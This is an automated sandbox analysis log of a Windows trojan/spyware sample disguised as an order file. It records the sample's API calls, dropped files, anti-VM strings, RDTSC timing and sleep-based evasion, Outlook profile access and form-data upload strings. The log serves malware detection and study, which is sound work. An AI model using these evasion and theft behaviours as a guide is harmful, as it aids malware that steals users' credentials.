Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8E9C8 4_2_3AE8E9C8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8E9D8 4_2_3AE8E9D8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8C9D8 4_2_3AE8C9D8
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE81190 4_2_3AE81190
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE80D48 4_2_3AE80D48
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8E548 4_2_3AE8E548
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8C548 4_2_3AE8C548
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8C558 4_2_3AE8C558
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8A928 4_2_3AE8A928
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8A938 4_2_3AE8A938
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE8E538 4_2_3AE8E538
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_3AE80D39 4_2_3AE80D39
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: String function: 00402C41 appears 51 times
Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007787000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ORDER 20240986 OA.exe
Source: ORDER 20240986 OA.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/5@4/4
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040336C
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004046FF
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_00402104
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Mutant created: NULL
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File created: C:\Users\user\AppData\Local\Temp\nsr11BF.tmp
Source: ORDER 20240986 OA.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ORDER 20240986 OA.exe ReversingLabs: Detection: 44%
Source: ORDER 20240986 OA.exe Virustotal: Detection: 33%
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File read: C:\Users\user\Desktop\ORDER 20240986 OA.exe
Source: unknown Process created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe"
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe"
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: ORDER 20240986 OA.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match File source: 00000000.00000002.2287809032.0000000003873000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2287296673.000000000083C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER 20240986 OA.exe PID: 7316, type: MEMORYSTR
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_6FBB1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FBB1B63
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_6FBB2FD0 push eax; ret 0_2_6FBB2FFE
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00159C30 push esp; retf 0017h 4_2_00159D55
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe File created: C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dll
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe API/Special instruction interceptor: Address: 3C78CCE
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe API/Special instruction interceptor: Address: 2A18CCE
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe RDTSC instruction interceptor: First address: 3C164A6 second address: 3C164A6 instructions: 0x00000000 rdtsc 0x00000002 cmp bl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F6DB1459D15h 0x00000008 inc ebp 0x00000009 cmp ax, dx 0x0000000c inc ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe RDTSC instruction interceptor: First address: 29B64A6 second address: 29B64A6 instructions: 0x00000000 rdtsc 0x00000002 cmp bl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F6DB133B325h 0x00000008 inc ebp 0x00000009 cmp ax, dx 0x0000000c inc ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Memory allocated: 37BD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Memory allocated: 37B00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599639 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599406 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598938 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598469 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598250 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598141 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 598031 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597922 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597813 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597688 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597578 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597469 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597344 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597235 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 597110 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596985 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596860 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596735 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596247 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596125 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 596016 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595891 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595344 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 595016 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594891 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594766 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594656 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594547 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594437 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Thread delayed: delay time: 594328 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Window / User API: threadDelayed 8654 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Window / User API: threadDelayed 1183 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe API coverage: 0.2 %
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -33204139332677172s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8080 Thread sleep count: 8654 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8080 Thread sleep count: 1183 > 30 Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599639s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599516s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -599063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598359s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598250s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598141s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -598031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597922s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597688s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -597110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596247s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -596016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -595016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe TID: 8076 Thread sleep time: -594328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_00402868 FindFirstFileW, 4_2_00402868
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_004065DA FindFirstFileW,FindClose, 4_2_004065DA
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 4_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004059A9
Source: ORDER 20240986 OA.exe, 00000000.00000002.2287296673.0000000000808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\FE
Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007718000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007778000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D65000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $dqEmultipart/form-data; boundary=------------------------8dd0b6f4848dbcf<
Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $dqEmultipart/form-data; boundary=------------------------8dd0b4a7224cc3a<
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_00404243 LdrInitializeThunk,SendMessageW, 0_2_00404243
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Code function: 0_2_6FBB1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FBB1B63
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Process created: C:\Users\user\Desktop\ORDER 20240986 OA.exe "C:\Users\user\Desktop\ORDER 20240986 OA.exe" Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Users\user\Desktop\ORDER 20240986 OA.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER 20240986 OA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
